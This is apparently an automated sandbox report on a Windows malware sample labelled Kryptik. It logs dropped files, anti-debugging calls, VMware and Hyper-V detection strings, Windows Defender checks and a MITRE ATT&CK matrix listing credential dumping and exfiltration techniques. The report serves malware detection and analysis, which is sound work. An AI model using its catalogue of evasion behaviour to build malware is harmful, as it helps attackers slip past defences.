Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeAPI coverage: 9.6 %
Source: Amcache.hve.3.drBinary or memory string: VMware
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: vmci.sys
Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: VMware20,1
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041B919 mov eax, dword ptr fs:[00000030h]0_2_0041B919
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00414C8F mov eax, dword ptr fs:[00000030h]0_2_00414C8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_007AAA23 push dword ptr fs:[00000030h]0_2_007AAA23
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0218BB80 mov eax, dword ptr fs:[00000030h]0_2_0218BB80
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217092B mov eax, dword ptr fs:[00000030h]0_2_0217092B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_02184EF6 mov eax, dword ptr fs:[00000030h]0_2_02184EF6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_02170D90 mov eax, dword ptr fs:[00000030h]0_2_02170D90
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_00402C60 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D949 SetUnhandledExceptionFilter,0_2_0040D949
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040CD96 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD96
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D7B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D7B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217DA1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0217DA1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217DBB0 SetUnhandledExceptionFilter,0_2_0217DBB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_021813E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_021813E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217CFFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0217CFFD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D9B3 cpuid 0_2_0040D9B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_00421135
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_00421180
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0042121B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004212A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_00419BF4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_004214F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0042161F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420E93
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_00421725
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0041972F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004217F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_02191A5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0219139C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_021913E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_02191886
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_02189996
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_0219198C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_02189E5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_02191760
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_02191482
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0219150D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040DBE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040DBE5
Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory151
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
